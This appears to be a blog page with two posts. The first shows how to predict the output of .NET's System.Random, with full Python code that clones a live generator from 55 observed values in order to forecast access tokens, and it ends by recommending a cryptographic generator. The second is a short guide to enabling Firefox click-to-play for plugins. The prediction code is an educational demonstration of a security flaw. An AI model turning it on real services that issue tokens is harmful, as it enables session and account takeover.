Breaking .NET’s Random class

Security is hard. In a current project I saw some code that created access tokens from a random number generator, .NET’s Random class. The code kept a single Random instance in a static field, and that made me curious:

If you have such a long-lived Random instance, can you predict its output after observing a few of its values?

It turns out you can, and you only need to read 55 “random” values to predict all future values.
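To make the attack concrete, here is an added example (written for this page, not code from the original post): a Python port of the seeded System.Random algorithm, Knuth’s subtractive lagged-Fibonacci generator used by the .NET Framework and by .NET Core/5+ whenever a seed is supplied, plus the recovery step that turns 55 consecutive Next() outputs into a clone of the live instance. It assumes the attacker sees the raw Next() return values, for instance because a token embeds them directly. The seed, the 17-value head start, and the class and function names are constructed for the demonstration.

```python
# Added example: port of System.Random(int seed) and state recovery from 55 outputs.
MBIG = 2**31 - 1        # int.MaxValue
MSEED = 161803398       # seeding constant from the .NET source
STATE_SIZE = 55         # SeedArray has 56 slots; index 0 is never used


def _int32(x):
    """Emulate C# unchecked int arithmetic (wrap to signed 32-bit)."""
    x &= 0xFFFFFFFF
    return x - 2**32 if x >= 2**31 else x


class DotNetRandom:
    """Port of the seeded System.Random; only the integer paths are needed here."""

    def __init__(self, seed):
        subtraction = MBIG if seed == -2**31 else abs(seed)
        mj = MSEED - subtraction
        self.seed_array = [0] * (STATE_SIZE + 1)
        self.seed_array[55] = mj
        mk = 1
        for i in range(1, 55):
            ii = (21 * i) % 55
            self.seed_array[ii] = mk
            mk = _int32(mj - mk)
            if mk < 0:
                mk += MBIG
            mj = self.seed_array[ii]
        for _ in range(4):                       # C#: for (k = 1; k < 5; k++)
            for i in range(1, 56):
                self.seed_array[i] = _int32(
                    self.seed_array[i] - self.seed_array[1 + (i + 30) % 55])
                if self.seed_array[i] < 0:
                    self.seed_array[i] += MBIG
        self.inext = 0
        self.inextp = 21

    @classmethod
    def from_state(cls, outputs):
        """Rebuild a generator from 55 consecutive raw Next() outputs.

        Every InternalSample() writes its return value back into SeedArray, so
        55 consecutive outputs are the complete state. The two indices always
        stay 21 slots apart (mod 55), so the leaked values can be laid into
        slots 1..55 with inext = 0 / inextp = 21 no matter where in the
        stream the observation started.
        """
        if len(outputs) != STATE_SIZE:
            raise ValueError("need exactly 55 consecutive Next() outputs")
        clone = cls.__new__(cls)
        clone.seed_array = [0] + list(outputs)
        clone.inext = 0
        clone.inextp = 21
        return clone

    def _internal_sample(self):
        loc_inext = self.inext + 1
        loc_inextp = self.inextp + 1
        if loc_inext >= 56:
            loc_inext = 1
        if loc_inextp >= 56:
            loc_inextp = 1
        ret = self.seed_array[loc_inext] - self.seed_array[loc_inextp]
        if ret == MBIG:
            ret -= 1
        if ret < 0:
            ret += MBIG
        self.seed_array[loc_inext] = ret        # the output becomes state
        self.inext = loc_inext
        self.inextp = loc_inextp
        return ret

    def next(self, max_value=None):
        """Random.Next() or Random.Next(maxValue)."""
        if max_value is None:
            return self._internal_sample()
        # Sample() * maxValue, truncated like the C# (int) cast
        return int(self._internal_sample() * (1.0 / MBIG) * max_value)


def predict_next_values(observed, count):
    """Given 55 consecutive raw Next() outputs from a live Random instance,
    return the next `count` values it will produce."""
    clone = DotNetRandom.from_state(observed)
    return [clone.next() for _ in range(count)]


if __name__ == "__main__":
    # Constructed scenario: a long-lived Random (hypothetical seed) that has
    # already handed out 17 tokens before the attacker starts watching.
    victim = DotNetRandom(20130117)
    for _ in range(17):
        victim.next()
    leaked = [victim.next() for _ in range(STATE_SIZE)]
    predicted = predict_next_values(leaked, 5)
    actual = [victim.next() for _ in range(5)]
    print("predicted:", predicted)
    print("actual:   ", actual)
    assert predicted == actual
```

Because each output is written straight back into the 55-slot state array, the 55 observed values are the state itself, and the clone is exact from the first predicted value on, including anything later drawn through Next(maxValue). For anything token-like, System.Security.Cryptography.RandomNumberGenerator is the right tool, not Random.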


Click to play for plugins (Flash, Java) in Firefox

In Google Chrome, there is an option to enable “Click to Play” for plugins such as Flash, Java, or Silverlight. This makes the browser safer (especially after all the Java security vulnerabilities of late) and a little bit faster, because plugin content only runs once you explicitly click it. Today I found out that this option exists in Firefox too, although it is a little bit hidden.

To enable “Click to Play” in Firefox…

  1. go to about:config and click on “I’ll be careful, I promise!”
  2. search for plugins.click_to_play and set it to true (by double-clicking the entry)

[Screenshot: plugins.click_to_play set to true in about:config]

After that, when you open a page that embeds Flash (for example a video), Java, or any other plugin, you get a “Click to Play” placeholder for the plugin instead of it running automatically.

[Screenshot: the “Click to Play” message shown in place of a plugin]